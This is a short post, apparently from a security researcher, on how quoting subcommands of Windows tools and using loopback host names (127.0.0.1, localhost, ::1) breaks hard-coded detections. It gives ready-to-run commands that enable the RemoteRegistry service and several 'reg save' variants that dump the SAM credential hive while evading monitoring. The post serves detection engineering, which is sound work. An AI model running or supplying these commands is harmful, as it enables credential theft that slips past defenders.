Many Windows tools support commands f.ex.:
- reg.exe – QUERY, ADD, DELETE, COPY, SAVE, RESTORE, LOAD, UNLOAD, COMPARE, EXPORT, IMPORT, FLAGS
- sc.exe – config, continue, control, create, delete, description, EnumDepend, failure, failureflag, GetDisplayName, GetKeyName, interrogate, managedaccount, pause, preferrednode, privs, qc, qdescription, qfailure, qfailureflag, qmanagedaccount, qpreferrednode, qprivs, qprotection, qsidtype, qtriggerinfo, query, queryex, quserservice, sdset, sdshow, showsid, sidtype, start, stop, triggerinfo
- netsh.exe – ?, add, advfirewall, branchcache, bridge, delete, dhcpclient, dnsclient, dump, exec, firewall, help, http, interface, ipsec, lan, mbn, namespace, netio, p2p, ras, rpc, set, show, trace, wcn, wfp, winhttp, winsock, wlan
- fsutil.exe – 8dot3name, behavior, dax, dirty, file, fsInfo, hardlink, objectID, quota, repair, reparsePoint, resource, sparse, storageReserve, tiering, transaction, usn, volume, wim
We are very used to their invocations in a form of tool command but there is an alternative way to invoke them by using quotes around these commands f.ex.:
- reg.exe “query” is identical with reg.exe query
- sc.exe “start” is identical with sc start
- etc.
This breaks many hard-coded detections.
The second secret is the omnipresent support for everything ‘remote’, that is – operations that can be executed on other endpoints.
As such, one can use computer names in many of these commands, f.ex. we can prefix registry keys for reg.exe command with host names. And this includes localhost, 127.0.0.1, ::1 – yet notably, for these to work the RemoteRegistry service needs to be running on a local host. It’s actually very easy to do so:
sc config remoteregistry start= auto sc start remoteregistry
and then we can easily run one of these:
reg save \\127.0.0.1\hklm\sam sam reg save \\localhost\hklm\sam sam reg save \\::1\hklm\sam sam reg "save" \\127.0.0.1\hklm\sam sam reg "save" \\localhost\hklm\sam sam reg "save" \\::1\hklm\sam sam
This will break many detections too.